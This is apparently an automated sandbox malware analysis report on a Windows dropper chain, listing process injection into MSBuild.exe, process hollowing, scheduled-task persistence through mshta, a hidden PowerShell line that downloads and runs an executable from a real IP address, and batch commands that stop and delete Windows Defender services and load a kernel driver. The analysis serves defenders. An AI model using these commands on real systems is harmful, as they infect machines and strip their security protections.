Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF7387883F8 SetUnhandledExceptionFilter, 25_2_00007FF7387883F8
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738788408 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_00007FF738788408
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738788088 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 25_2_00007FF738788088

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: amsi32_5340.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_656.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: mshta.exe PID: 5740, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mshta.exe PID: 5280, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 656, type: MEMORYSTR
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Section unmapped: unknown base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44D000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FF6008
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 41E000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 422000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 425000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 426000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 427000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 428000
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 72D008
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41C000
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 429000
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42C000
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E41201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00E41201
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E22BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00E22BA5
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4B226 SendInput,keybd_event, 0_2_00E4B226
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_00E622DA
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn 2S7Jyma4CpI /tr "mshta C:\Users\user\AppData\Local\Temp\tOEPAwmQl.hta" /sc minute /mo 25 /ru "user" /f Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE" Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE "C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe "C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe "C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe "C:\Users\user\AppData\Local\Temp\10351780101\apple.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe "C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe "C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Local\Temp\10351780101\apple.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\4F33.tmp\4F34.tmp\4F35.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\504C.tmp\504D.tmp\504E.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe Process created: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe"
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E40B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00E40B62
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E41663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00E41663
Source: Af3hqfTjFh.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000002.996513045.0000000000C98000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, rapes.exe, 0000000C.00000002.991548172.0000000000CF8000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Program Manager
Source: Af3hqfTjFh.exe Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E00698 cpuid 0_2_00E00698
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: EnumSystemLocalesW, 22_2_00007FF748F4EAE0
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW, 22_2_00007FF748F4EC80
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 22_2_00007FF748F4E4C8
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW, 22_2_00007FF748F4EB78
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW, 22_2_00007FF748F4EE18
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: EnumSystemLocalesW, 22_2_00007FF748F49550
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 22_2_00007FF748F4ED68
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW, 22_2_00007FF748F48DD8
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 22_2_00007FF748F4E898
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: EnumSystemLocalesW, 22_2_00007FF748F4E7C8
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: EnumSystemLocalesW, 25_2_00007FF73879EAE0
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW, 25_2_00007FF73879EB78
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 25_2_00007FF73879E4C8
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW, 25_2_00007FF73879EC80
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW, 25_2_00007FF738798DD8
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: EnumSystemLocalesW, 25_2_00007FF738799550
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 25_2_00007FF73879ED68
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW, 25_2_00007FF73879EE18
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: EnumSystemLocalesW, 25_2_00007FF73879E7C8
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 25_2_00007FF73879E898
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
